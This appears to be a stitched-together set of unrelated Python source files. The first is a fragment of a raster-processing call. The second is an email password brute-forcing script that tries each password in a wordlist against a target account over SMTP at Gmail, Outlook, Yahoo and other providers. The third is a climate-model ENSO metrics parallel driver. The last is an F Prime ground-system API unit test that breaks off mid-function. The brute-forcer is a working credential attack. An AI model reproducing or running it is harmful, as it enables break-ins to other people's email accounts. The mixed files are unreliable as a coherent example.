input=os.path.join(RESULTS_DIR, "features.tif"),
model=MODEL_PATH,
out=os.path.join(RESULTS_DIR, "cover.tif"),
)
)
|
import smtplib
import os,sys
import time,random
import threading
import argparse
H = '\033[95m'
B = '\033[94m'
G = '\033[92m'
W = '\033[93m'
F = '\033[91m'
E = '\033[0m'
U = '\033[4m'
O = '\033[33m'
serv = None
port = 587
os.chdir('modules/')
parser = argparse.ArgumentParser(description="Framework Hunner")
parser.add_argument('login', help='Target email')
parser.add_argument('password', help='<PASSWORD>')
args = parser.parse_args()
if args.login or args.password:
login = args.login
password_list = args.password
if os.path.exists(password_list):
file = open(password_list,'r')
else:
print(F+'File not exist'+E)
sys.exit(1)
def banner():
text1 = '''
___ ___ _ _ _ _
| \/ | (_) | | | |
| . . | __ _ _| | |_| |_ _ _ __ _ __ ___ _ __
| |\/| |/ _` | | | _ | | | | '_ \| '_ \ / _ \ '__|
| | | | (_| | | | | | | |_| | | | | | | | __/ |
\_| |_/\__,_|_|_\_| |_/\__,_|_| |_|_| |_|\___|_|
'''
text2 = '''
_ _
/\/\ __ _(_) | /\ /\_ _ _ __ _ __ ___ _ __
/ \ / _` | | |/ /_/ / | | | '_ \| '_ \ / _ \ '__|
/ /\/\ \ (_| | | / __ /| |_| | | | | | | | __/ |
\/ \/\__,_|_|_\/ /_/ \__,_|_| |_|_| |_|\___|_|
'''
if random.randrange(0,1) == 0:
print(text1)
else:
print(text2)
def clear():
os.system('clear')
def check_mail():
global serv
clear()
banner()
print(B+'Enter servese smtp:'+E)
print(H+"""
1) Gmail
2) Outlook
3) Yahoo
4) At&T
5) Mail.com
6) Comcast
7) By hand
"""+E)
ServerSmtp = input(W+'Hunner»Mail»ServerSmtp»'+E)
if int(ServerSmtp) == 1:
serv = 'smtp.gmail.com'
port = 465
elif int(ServerSmtp) == 2:
serv = 'smtp-mail.outlook.com'
port = 587
elif int(ServerSmtp) == 3:
serv = 'smtm.mail.yahoo.com'
port = 587
elif int(ServerSmtp) == 4:
serv = 'smtm.mail.att.net'
port = 465
elif int(ServerSmtp) == 5:
serv = 'smtm.mail.com'
port = 587
elif int(ServerSmtp) == 6:
serv = 'smtm.comcast.com'
port = 587
elif int(ServerSmtp) == 7:
serv = input('Enter smtp server (Exemple:smtp.gmail.com)')
port = input('Enter port smtp server (Default port: 587)')
else:
print('Error ')
sys.exit(1)
def brut():
print(F+'Start brutforse'+E)
try:
smtp = smtplib.SMTP(str(serv), int(port))
smtp.ehlo()
smtp.starttls()
except:
print(error)
for line in file:
try:
passw = line.strip('\r\n')
smtp.login(login, passw)
print(W+time.ctime()+B+' Work mail login-> '+W+login+B+' password-> '+W+passw)
break
sys.exit(1)
except:
print(F + time.ctime() + E + ' Not work ->'+E+login+E+'Password ->'+E+passw)
check_mail()
t1 = threading.Thread(target=brut)
t1.start()
|
<reponame>tomvothecoder/pcmdi_metrics<filename>pcmdi_metrics/enso/scripts_pcmdi/parallel_driver.py
#!/usr/bin/env python
"""
Usage example:
1. First realization per model
./parallel_driver.py -p my_Param_ENSO.py --mip cmip6 --modnames all --realization r1i1p1f1 --metricsCollection ENSO_perf
2. All realizations of individual models
./parallel_driver.py -p my_Param_ENSO.py --mip cmip6 --modnames all --realization all --metricsCollection ENSO_perf
"""
from __future__ import print_function
from genutil import StringConstructor
from pcmdi_metrics.enso.lib import AddParserArgument, find_realm
from pcmdi_metrics.variability_mode.lib import sort_human
from pcmdi_metrics.misc.scripts import parallel_submitter
import glob
import os
# =================================================
# Collect user defined options
# -------------------------------------------------
param = AddParserArgument()
# Pre-defined options
mip = param.mip
exp = param.exp
print('mip:', mip)
print('exp:', exp)
# Path to model data as string template
modpath = param.process_templated_argument("modpath")
# Check given model option
models = param.modnames
print('models:', models)
# Include all models if conditioned
if mip == "CLIVAR_LE":
inline_separator = '_'
else:
inline_separator = '.'
if ('all' in [m.lower() for m in models]) or (models == 'all'):
model_index_path = param.modpath.split('/')[-1].split(inline_separator).index("%(model)")
models = ([p.split('/')[-1].split(inline_separator)[model_index_path] for p in glob.glob(modpath(
mip=mip, exp=exp, model='*', realization='*', variable='ts'))])
# remove duplicates
models = sorted(list(dict.fromkeys(models)), key=lambda s: s.lower())
print('models:', models)
print('number of models:', len(models))
# Realizations
realization = param.realization
if ('all' in [r.lower() for r in realization]) or (realization == 'all'):
realization = '*'
print('realization: ', realization)
# Metrics Collection
mc_name = param.metricsCollection
# case id
case_id = param.case_id
print('case_id:', case_id)
# Output
outdir_template = param.process_templated_argument("results_dir")
outdir = StringConstructor(str(outdir_template(
output_type='%(output_type)',
mip=mip, exp=exp, metricsCollection=mc_name, case_id=case_id)))
# Debug
debug = param.debug
print('debug:', debug)
# =================================================
# Create output directories
# -------------------------------------------------
for output_type in ['graphics', 'diagnostic_results', 'metrics_results']:
if not os.path.exists(outdir(output_type=output_type)):
os.makedirs(outdir(output_type=output_type))
print(outdir(output_type=output_type))
# =================================================
# Generates list of command
# -------------------------------------------------
if mip == "obs2obs":
param_file = '../param/my_Param_ENSO_obs2obs.py'
if mip == "CLIVAR_LE":
# param_file = '../param/my_Param_ENSO_PCMDIobs_CLIVAR_LE-CESM1-CAM5.py'
param_file = '../param/my_Param_ENSO_PCMDIobs_CLIVAR_LE_CanESM2.py'
else:
param_file = '../param/my_Param_ENSO_PCMDIobs.py'
cmds_list = []
logfilename_list = []
for model in models:
print(' ----- model: ', model, ' ---------------------')
# Find all xmls for the given model
realm, areacell_in_file = find_realm('ts', mip)
model_path_list = glob.glob(
modpath(mip=mip, exp=exp, realm=realm, model=model, realization="*", variable='ts'))
# sort in nice way
model_path_list = sort_human(model_path_list)
if debug:
print('model_path_list:', model_path_list)
try:
# Find where run can be gripped from given filename template for modpath
run_in_modpath = modpath(mip=mip, exp=exp, realm=realm, model=model, realization=realization,
variable='ts').split('/')[-1].split(inline_separator).index(realization)
if debug:
print('run_in_modpath:', run_in_modpath)
# Collect available runs
runs_list = [model_path.split('/')[-1].split(inline_separator)[run_in_modpath]
for model_path in model_path_list]
except Exception:
if realization not in ["*", "all"]:
runs_list = [realization]
if debug:
print('runs_list (all):', runs_list)
# Check if given run member is included. If not for all runs and given run member is not included,
# take alternative run
if realization != "*":
if realization in runs_list:
runs_list = [realization]
else:
runs_list = runs_list[0:1]
if debug:
print('runs_list (revised):', runs_list)
for run in runs_list:
# command line for queue
cmd = ['enso_driver.py',
'-p', param_file,
'--mip', mip, '--metricsCollection', mc_name,
'--case_id', case_id,
'--modnames', model,
'--realization', run]
cmds_list.append(' '.join(cmd))
# log file for each process
logfilename = '_'.join(['log_enso', mc_name, mip, exp, model, run, case_id])
logfilename_list.append(logfilename)
print(' --- jobs to submit ---')
for cmd in cmds_list:
print(cmd)
print(' --- end of jobs to submit ---')
# =================================================
# Run subprocesses in parallel
# -------------------------------------------------
# log dir
log_dir = outdir(output_type='log')
os.makedirs(log_dir, exist_ok=True)
# number of tasks to submit at the same time
# num_workers = 7
# num_workers = 10
num_workers = 15
# num_workers = 30
# num_workers = 25
parallel_submitter(cmds_list, log_dir=log_dir,
logfilename_list=logfilename_list,
num_workers=num_workers)
|
<filename>Gds/test/fprime_gds/common/testing_fw/api_unit_test.py
import math
import os
import sys
import threading
import time
import unittest
# these imports are needed to generate data objects.
from fprime.common.models.serialize.numerical_types import I32Type, U32Type
from fprime.common.models.serialize.time_type import TimeType
from fprime_gds.common.data_types.ch_data import ChData
from fprime_gds.common.data_types.cmd_data import CmdData
from fprime_gds.common.data_types.event_data import EventData
from fprime_gds.common.history.test import TestHistory
from fprime_gds.common.pipeline.standard import StandardPipeline
from fprime_gds.common.testing_fw import predicates
from fprime_gds.common.testing_fw.api import IntegrationTestAPI
from fprime_gds.common.utils.config_manager import ConfigManager
filename = os.path.dirname(__file__)
gdsName = os.path.join(filename, "../../../../src")
fprimeName = os.path.join(filename, "../../../../../Fw/Python/src")
sys.path.insert(0, gdsName)
sys.path.insert(0, fprimeName)
class UTPipeline(StandardPipeline):
"""
This pipeline shares many of the same calls available in pipeline.standard. It
is used by this testcase to feed simulated data to the test api.
"""
def __init__(self):
self.command_count = 0
self.t0 = TimeType()
StandardPipeline.__init__(self)
def connect(self, address, port):
pass
def disconnect(self):
pass
def send_command(self, command, args):
command_template = self.dictionaries.command_id[command]
cmd_data = CmdData(tuple(args), command_template)
self.histories.commands.data_callback(cmd_data)
for hist in self.coders.command_subscribers:
hist.data_callback(cmd_data)
ev_temp = self.dictionaries.event_name["CommandReceived"]
event = EventData((U32Type(cmd_data.get_id()),), self.t0 + time.time(), ev_temp)
self.enqueue_event(event)
ev_temp = self.dictionaries.event_name["HistorySizeUpdate"]
evr_size = U32Type(len(self.histories.events.retrieve()))
cmd_size = U32Type(len(self.histories.commands.retrieve()))
ch_size = U32Type(len(self.histories.channels.retrieve()))
event = EventData((evr_size, cmd_size, ch_size), self.t0 + time.time(), ev_temp)
self.enqueue_event(event)
self.command_count += 1
ch_temp = self.dictionaries.channel_name["CommandCounter"]
update = ChData(U32Type(self.command_count), self.t0 + time.time(), ch_temp)
self.enqueue_telemetry(update)
def enqueue_event(self, event):
"""
Used by the unit test to feed simulated data objects into the pipeline
"""
self.coders.event_decoder.send_to_all(event)
def enqueue_telemetry(self, channel):
"""
Used by the unit test to feed simulated data objects into the pipeline
"""
self.coders.channel_decoder.send_to_all(channel)
class APITestCases(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.pipeline = UTPipeline()
config = ConfigManager()
path = os.path.join(filename, "./UnitTestDictionary.xml")
down_store = os.path.join(filename, "./")
cls.pipeline.setup(config, path, down_store)
log_path = os.path.join(filename, "./logs")
cls.api = IntegrationTestAPI(cls.pipeline, log_path)
cls.case_list = [] # TODO find a better way to do this.
cls.threads = []
def setUp(self):
for t in self.threads:
if t.isAlive():
t.join()
self.threads.clear()
count = len(self.case_list)
self.api.start_test_case(self._testMethodName, count)
self.case_list.append(1)
self.tHistory = TestHistory()
self.t0 = TimeType()
@classmethod
def tearDownClass(cls):
cls.pipeline.disconnect()
cls.api.teardown()
######################################################################################
# Test Case Helper Methods
######################################################################################
def fill_history(self, callback, items, timestep=0.0):
for item in items:
if timestep:
time.sleep(timestep)
if isinstance(item, ChData) or isinstance(item, EventData):
if item.time == 0:
item.time = self.t0 + time.time()
callback(item)
def fill_history_async(self, callback, items, timestep=1.0):
t = threading.Thread(target=self.fill_history, args=(callback, items, timestep))
self.threads.append(t)
t.start()
return t
@staticmethod
def assert_lists_equal(expected, actual):
assert len(expected) == len(
actual
), "the given list should have had the length {}, but instead had {}\nExpected {}\nActual{}".format(
len(expected), len(actual), expected, actual
)
for i in range(len(expected)):
assert (
expected[i] == actual[i]
), "the {} element of the expected list should be {}, but was {}.".format(
i, expected[i], actual[i]
)
def get_counter_sequence(self, length):
seq = []
for i in range(0, length):
ch_temp = self.pipeline.dictionaries.channel_name["Counter"]
seq.append(ChData(U32Type(i), TimeType(), ch_temp))
return seq
def get_oscillator_sequence(self, length):
seq = []
for i in range(0, length):
ch_temp = self.pipeline.dictionaries.channel_name["Oscillator"]
val = int(round(10 * math.sin(math.radians(i))))
seq.append(ChData(I32Type(val), TimeType(), ch_temp))
return seq
def get_severity_event(self, severity="DIAGNOSTIC"):
name = "Severity" + severity
temp = self.pipeline.dictionaries.event_name[name]
event = EventData(tuple(), TimeType(), temp)
return event
def get_severity_sequence(self, length, severity="DIAGNOSTIC"):
seq = []
for i in range(0, length):
seq.append(self.get_severity_event(severity))
return seq
class AssertionFailure(Exception):
"""
Used to differentiate an AssertionError in test cases that intentionally raise an
assertion error.
"""
######################################################################################
# Test Cases
######################################################################################
def test_dummy_pipeline(self):
length = 15
event_list = self.get_severity_sequence(length)
t1 = self.fill_history_async(self.pipeline.enqueue_event, event_list, 0.1)
print("waiting for queue to fill")
pred = predicates.greater_than_or_equal_to(length // 2)
results = self.api.await_event_count(pred)
assert pred(len(results)), "the correct amount of objects was received"
t1.join()
evr_hist = self.api.get_event_test_history()
item_count = len(evr_hist)
assert (
item_count == length
), "Were the correct number of items in the history? ({},{})".format(
item_count, length
)
def test_find_history_item(self):
self.fill_history(self.tHistory.data_callback, range(0, 50))
self.fill_history(self.tHistory.data_callback, range(0, 50))
pred = predicates.equal_to(25)
result = self.api.find_history_item(pred, self.tHistory)
assert result == 25, "The search should have returned 25, but found {}".format(
result
)
result = self.api.find_history_item(pred, self.tHistory, start=50)
assert result == 25, "The search should have returned 25, but found {}".format(
result
)
result = self.api.find_history_item(pred, self.tHistory, start=80)
assert (
result is None
), "The search should have returned None, but found {}".format(result)
def test_find_history_item_timeout(self):
pred = predicates.equal_to(25)
listA = range(0, 50)
self.fill_history_async(self.tHistory.data_callback, listA, 0.01)
result = self.api.find_history_item(pred, self.tHistory, timeout=1)
assert result == 25, "The search should have returned 25, but found {}".format(
result
)
pred = predicates.equal_to(49)
result = self.api.find_history_item(pred, self.tHistory, timeout=1)
assert result == 49, "The search should have returned 49, but found {}".format(
result
)
self.tHistory.clear()
listA = range(0, 50)
pred = predicates.equal_to(49)
self.fill_history_async(self.tHistory.data_callback, listA, 0.1)
result = self.api.find_history_item(pred, self.tHistory, timeout=1)
assert (
result is None
), "The search should have returned None, but found {}".format(result)
def test_find_history_sequence(self):
sequence = []
for i in range(30, 40, 2):
sequence.append(predicates.equal_to(i))
self.fill_history(self.tHistory.data_callback, range(0, 50))
results = self.api.find_history_sequence(sequence, self.tHistory)
assert len(results) == len(
sequence
), "The search should have found {}, but returned {}".format(
range(30, 40, 2), results
)
self.assert_lists_equal(range(30, 40, 2), results)
results = self.api.find_history_sequence(sequence, self.tHistory, start=34)
assert len(results) != len(
sequence
), "The search should have returned an incomplete list, but found {}".format(
results
)
self.fill_history(self.tHistory.data_callback, range(0, 50))
results = self.api.find_history_sequence(sequence, self.tHistory, start=34)
assert len(results) == len(
sequence
), "The search should have found {}, but returned {}".format(
range(30, 40, 2), results
)
self.assert_lists_equal(range(30, 40, 2), results)
results = self.api.find_history_sequence(sequence, self.tHistory, start=90)
assert len(results) != len(
sequence
), "The search should have returned an incomplete list, but found {}".format(
results
)
def test_find_history_sequence_timeout(self):
sequence = []
for i in range(30, 40, 2):
sequence.append(predicates.equal_to(i))
self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01)
results = self.api.find_history_sequence(sequence, self.tHistory, timeout=1)
assert results is not None, "The search should have found a sequence"
self.assert_lists_equal(range(30, 40, 2), results)
self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01)
results = self.api.find_history_sequence(
sequence, self.tHistory, start=34, timeout=1
)
assert results is not None, "The search should have found a sequence"
self.assert_lists_equal(range(30, 40, 2), results)
self.tHistory.clear()
self.fill_history_async(self.tHistory.data_callback, range(25, 50), 0.1)
results = self.api.find_history_sequence(
sequence, self.tHistory, start=90, timeout=1
)
assert len(results) != len(
sequence
), "The search should have returned an incomplete list, but found {}".format(
results
)
def test_find_history_count(self):
count_pred = predicates.greater_than_or_equal_to(10)
search_pred = predicates.greater_than_or_equal_to(40)
self.fill_history(self.tHistory.data_callback, range(0, 50))
results = self.api.find_history_count(count_pred, self.tHistory)
self.assert_lists_equal(range(0, 50), results)
results = self.api.find_history_count(count_pred, self.tHistory, search_pred)
self.assert_lists_equal(range(40, 50), results)
self.fill_history(self.tHistory.data_callback, range(50, 70))
results = self.api.find_history_count(count_pred, self.tHistory, search_pred)
self.assert_lists_equal(range(40, 70), results)
results = self.api.find_history_count(count_pred, self.tHistory, start=60)
self.assert_lists_equal(range(60, 70), results)
def test_find_history_count_timeout(self):
count_pred = predicates.greater_than_or_equal_to(10)
search_pred = predicates.greater_than_or_equal_to(40)
self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01)
results = self.api.find_history_count(count_pred, self.tHistory)
assert (
len(results) < 10
), "The search should have returned an incomplete list, but found {}".format(
results
)
results = self.api.find_history_count(
count_pred, self.tHistory, search_pred, timeout=2
)
self.assert_lists_equal(range(40, 50), results)
self.fill_history_async(self.tHistory.data_callback, range(50, 60), 0.01)
results = self.api.find_history_count(
count_pred, self.tHistory, search_pred, start=50, timeout=2
)
self.assert_lists_equal(range(50, 60), results)
self.tHistory.clear()
self.fill_history_async(self.tHistory.data_callback, range(35, 60), 0.1)
results = self.api.find_history_count(
count_pred, self.tHistory, search_pred, timeout=1
)
assert (
len(results) < 10
), "The search should have returned an incomplete list, but found {}".format(
results
)
def test_get_latest_fsw_time(self):
ts0 = self.api.get_latest_time()
time.sleep(0.1)
ts1 = self.api.get_latest_time()
assert (
ts0 is ts1
), "The starting timestamp should not have changed if no dataobjects were enqueued"
count_seq = self.get_counter_sequence(100)
event_seq = self.get_severity_sequence(100)
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02)
t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02)
last = ts0
for i in range(1, 10):
time.sleep(0.1)
tsi = self.api.get_latest_time()
assert tsi > last, "Iter {}: {} should be greater than {}".format(
i, tsi, last
)
last = tsi
t1.join()
t2.join()
tsn_1 = self.api.get_latest_time()
assert (
tsn_1 > last
), "The final timestamp, {}, should be greater than {}.".format(tsn_1, last)
time.sleep(0.1)
tsn_2 = self.api.get_latest_time()
assert (
tsn_2 == tsn_1
), "The timestamp should not have changed, while no data was streaming."
def test_clear_histories(self):
eventHistory = self.api.get_event_test_history()
channelHistory = self.api.get_telemetry_test_history()
commandHistory = self.api.get_command_test_history()
self.api.clear_histories()
assert eventHistory.size() == 0, "eventHistory should be empty"
assert channelHistory.size() == 0, "channelHistory should be empty"
count_seq = self.get_counter_sequence(100)
event_seq = self.get_severity_sequence(100)
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02)
t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02)
t1.join()
t2.join()
sizeE = eventHistory.size()
iE = sizeE // 2
firstE = eventHistory[iE]
timeE = firstE.get_time()
sizeC = channelHistory.size()
iC = 0
for i in range(0, channelHistory.size()):
if channelHistory[i].get_time() >= timeE:
iC = i
break
firstC = channelHistory[iC]
self.api.clear_histories(timeE)
msg = "The event history should have been reduced by {} elements".format(iE)
assert sizeE - iE == eventHistory.size(), msg
msg = "The element with the timestamp should be first in the history"
assert firstE is eventHistory[0], msg
msg = "The channel history should have been reduced by {} elements".format(iC)
assert sizeC - iC == channelHistory.size(), msg
msg = "The first element in the history should be the first with a valid time"
assert firstC is channelHistory[0], msg
args1 = []
self.api.send_command("apiTester.TEST_CMD_1", args1)
assert commandHistory.size() > 0, "history size should be greater than 0"
assert channelHistory.size() > 0, "history size should be greater than 0"
assert eventHistory.size() > 0, "history size should be greater than 0"
self.api.clear_histories()
assert commandHistory.size() == 0, "history size should be 0"
assert channelHistory.size() == 0, "history size should be 0"
assert eventHistory.size() == 0, "history size should be 0"
def test_registering_and_removing_subhistories(self):
# Verifying that retrieving a subhistory for events behaves as expected
event_hist = self.api.get_event_test_history()
self.pipeline.enqueue_event(self.get_severity_event())
assert event_hist.size() == 1, "There should be one event in the api's history"
event_subhist = self.api.get_event_subhistory()
assert event_subhist.size() == 0, "There should be no events in the subhistory"
self.pipeline.enqueue_event(self.get_severity_event())
assert event_hist.size() == 2, "There should be two events in the api's history"
assert event_subhist.size() == 1, "There should be one event in the subhistory"
assert self.api.remove_event_subhistory(event_subhist), "remove should succeed"
self.pipeline.enqueue_event(self.get_severity_event())
assert (
event_hist.size() == 3
), "There should be three events in the api's history"
assert event_subhist.size() == 1, "There should be one event in the subhistory"
self.api.clear_histories()
assert event_hist.size() == 0, "There should be no events in the api's history"
assert event_subhist.size() == 1, "There should be one event in the subhistory"
assert not self.api.remove_event_subhistory(
event_subhist
), "should not remove twice"
# same checks, but for telemetry
telem_seq = self.get_counter_sequence(3)
telem_hist = self.api.get_telemetry_test_history()
self.pipeline.enqueue_telemetry(telem_seq[0])
assert telem_hist.size() == 1, "There should be one update in the api's history"
telem_subhist = self.api.get_telemetry_subhistory()
assert telem_subhist.size() == 0, "There should be no updates in the subhistory"
self.pipeline.enqueue_telemetry(telem_seq[1])
assert (
telem_hist.size() == 2
), "There should be two updates in the api's history"
assert telem_subhist.size() == 1, "There should be one update in the subhistory"
assert self.api.remove_telemetry_subhistory(
telem_subhist
), "remove should succeed"
self.pipeline.enqueue_telemetry(telem_seq[2])
assert (
telem_hist.size() == 3
), "There should be three updates in the api's history"
assert telem_subhist.size() == 1, "There should be one update in the subhistory"
self.api.clear_histories()
assert telem_hist.size() == 0, "There should be no updates in the api's history"
assert telem_subhist.size() == 1, "There should be one update in the subhistory"
assert not self.api.remove_telemetry_subhistory(
telem_subhist
), "should not remove twice"
def test_translate_command_name(self):
assert self.api.translate_command_name("apiTester.TEST_CMD_1") == 1
assert self.api.translate_command_name("apiTester.TEST_CMD_2") == 2
assert self.api.translate_command_name("apiTester.TEST_CMD_3") == 3
assert self.api.translate_command_name(1) == 1
assert self.api.translate_command_name(2) == 2
assert self.api.translate_command_name(3) == 3
try:
self.api.translate_command_name("DOES_NOT_EXIST")
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
try:
self.api.translate_command_name(0)
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
def test_send_command(self):
args1 = []
self.api.send_command("apiTester.TEST_CMD_1", args1)
self.api.send_command(1, args1)
args2 = ["0x01", "0x02"]
self.api.send_command("apiTester.TEST_CMD_2", args2)
self.api.send_command(2, args2)
args3 = ["test message for the test command"]
self.api.send_command("apiTester.TEST_CMD_3", args3)
self.api.send_command(3, args3)
hist = self.api.get_command_test_history()
assert hist.size() == 6
for cmd in hist:
print(cmd)
def test_send_and_await_telemetry(self):
result = self.api.send_and_await_telemetry(
"apiTester.TEST_CMD_1", channels="CommandCounter"
)
assert (
result is not None
), "the search should find the telemetry generated by UTPipeline"
self.api.clear_histories()
seq = ["CommandCounter"] + ["Counter"] * 5
self.fill_history_async(
self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
)
results1 = self.api.send_and_await_telemetry(
"apiTester.TEST_CMD_1", channels=seq
)
assert len(results1) == 6, "Should have gotten 6 results out of the await"
self.fill_history_async(
self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
)
results2 = self.api.send_and_await_telemetry(
"apiTester.TEST_CMD_1", channels=seq
)
assert len(results2) == 6, "Should have gotten 6 results out of the await"
for i in range(0, 6):
assert results1[i] != results2[i], "These sequences should be unique items"
self.api.clear_histories()
seq = ["CommandCounter"] + ["Oscillator"] * 5
self.fill_history_async(
self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01
)
results = self.api.send_and_await_telemetry(
"apiTester.TEST_CMD_1", channels=seq
)
assert len(results) == 6, "Should have gotten 6 results out of the await"
def test_send_and_await_event(self):
result = self.api.send_and_await_event(
"apiTester.TEST_CMD_1", events="CommandReceived"
)
assert (
result is not None
), "the search should have found the CommandReceived Event"
self.api.clear_histories()
seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5
self.fill_history_async(
self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
)
results1 = self.api.send_and_await_event("apiTester.TEST_CMD_1", events=seq)
assert len(results1) == 6, "Should have gotten 6 results out of the await"
self.fill_history_async(
self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
)
results2 = self.api.send_and_await_event("apiTester.TEST_CMD_1", events=seq)
assert len(results2) == 6, "Should have gotten 6 results out of the await"
for i in range(0, 6):
assert results1[i] != results2[i], "These sequences should be unique items"
def test_send_and_assert_telemetry(self):
self.api.send_and_assert_telemetry(
"apiTester.TEST_CMD_1", channels="CommandCounter"
)
self.api.clear_histories()
seq = ["CommandCounter"] + ["Counter"] * 5
self.fill_history_async(
self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
)
results1 = self.api.send_and_assert_telemetry(
"apiTester.TEST_CMD_1", channels=seq, timeout=5
)
self.fill_history_async(
self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
)
results2 = self.api.send_and_assert_telemetry(
"apiTester.TEST_CMD_1", channels=seq, timeout=5
)
for i in range(0, 6):
assert results1[i] != results2[i], "These sequences should be unique items"
self.api.clear_histories()
seq = ["CommandCounter"] + ["Oscillator"] * 5
self.fill_history_async(
self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01
)
self.api.send_and_assert_telemetry(
"apiTester.TEST_CMD_1", channels=seq, timeout=5
)
def test_send_and_assert_event(self):
self.api.send_and_assert_event("apiTester.TEST_CMD_1", events="CommandReceived")
self.api.clear_histories()
seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5
self.fill_history_async(
self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
)
results1 = self.api.send_and_assert_event(
"apiTester.TEST_CMD_1", events=seq, timeout=5
)
self.fill_history_async(
self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
)
results2 = self.api.send_and_assert_event(
"apiTester.TEST_CMD_1", events=seq, timeout=5
)
for i in range(0, 6):
assert results1[i] != results2[i], "These sequences should be unique items"
def test_translate_telemetry_name(self):
assert self.api.translate_telemetry_name("CommandCounter") == 1
assert self.api.translate_telemetry_name("Oscillator") == 2
assert self.api.translate_telemetry_name("Counter") == 3
assert self.api.translate_telemetry_name(1) == 1
assert self.api.translate_telemetry_name(2) == 2
assert self.api.translate_telemetry_name(3) == 3
try:
self.api.translate_command_name("DOES_NOT_EXIST")
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
try:
self.api.translate_command_name(0)
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
def test_get_telemetry_pred(self):
pred = predicates.telemetry_predicate()
result = self.api.get_telemetry_pred(pred)
assert pred == result, "should return when channel is already telem_pred"
update = self.get_counter_sequence(1)[0]
pred = self.api.get_telemetry_pred(update.get_id(), update.get_val())
assert pred(update), "predicate should return true when fields are specified"
def test_await_telemetry(self):
seq = self.get_counter_sequence(20)
self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01)
result = self.api.await_telemetry("Counter", 8)
assert (
result is not None
), "Await should have found a correct channel update: {}".format(result)
time.sleep(1)
self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01)
result = self.api.await_telemetry("Counter", 8)
assert result is None, "Await should not have found an update: {}".format(
result
)
self.api.clear_histories()
self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1)
result = self.api.await_telemetry("Counter", 15, timeout=1)
assert result is None, "Await should not have found an update: {}".format(
result
)
def test_await_telemetry_sequence(self):
count_seq = self.get_counter_sequence(20)
sin_seq = self.get_oscillator_sequence(100)
search_seq = []
for i in range(15, 20):
pred = self.api.get_telemetry_pred("Counter", i)
search_seq.append(pred)
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
results = self.api.await_telemetry_sequence(search_seq)
assert len(results) == len(search_seq), "lists should have the same length"
for i in range(0, len(results)):
msg = predicates.get_descriptive_string(results[i], search_seq[i])
assert search_seq[i](results[i]), msg
t1.join()
t2.join()
results = self.api.await_telemetry_sequence(search_seq)
assert len(results) < len(
search_seq
), "repeating the search should not complete"
self.api.clear_histories()
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
results = self.api.await_telemetry_sequence(search_seq, timeout=1)
assert len(results) < len(
search_seq
), "repeating the search should not complete"
t1.join()
t2.join()
def test_await_telemetry_count(self):
count_seq = self.get_counter_sequence(20)
sin_seq = self.get_oscillator_sequence(100)
pred = predicates.greater_than_or_equal_to(10)
search_pred = self.api.get_telemetry_pred("Counter", pred)
count_pred = predicates.within_range(10, 20)
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
results = self.api.await_telemetry_count(count_pred, search_pred)
msg = predicates.get_descriptive_string(len(results), count_pred)
assert count_pred(len(results)), msg
t1.join()
t2.join()
self.api.clear_histories()
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
results = self.api.await_telemetry_count(100)
assert len(results) == 100, "await count should have found 100 items"
t1.join()
t2.join()
self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02)
results = self.api.await_telemetry_count(100, timeout=1)
assert len(results) < 100, "await count should have found fewer 100 items"
def test_assert_telemetry(self):
seq = self.get_counter_sequence(20)
self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01)
self.api.assert_telemetry("Counter", 8, timeout=1)
time.sleep(1)
self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01)
try:
self.api.assert_telemetry("Counter", 8, start="NOW", timeout=1)
raise self.AssertionFailure()
except AssertionError:
assert True, "api raised the correct error"
except self.AssertionFailure:
assert False, "api failed to raise an assertion error"
self.api.clear_histories()
self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1)
try:
self.api.assert_telemetry("Counter", 15, timeout=1)
raise self.AssertionFailure()
except AssertionError:
assert True, "api raised the correct error"
except self.AssertionFailure:
assert False, "api failed to raise an assertion error"
def test_assert_telemetry_sequence(self):
count_seq = self.get_counter_sequence(20)
sin_seq = self.get_oscillator_sequence(100)
search_seq = []
for i in range(15, 20):
pred = self.api.get_telemetry_pred("Counter", i)
search_seq.append(pred)
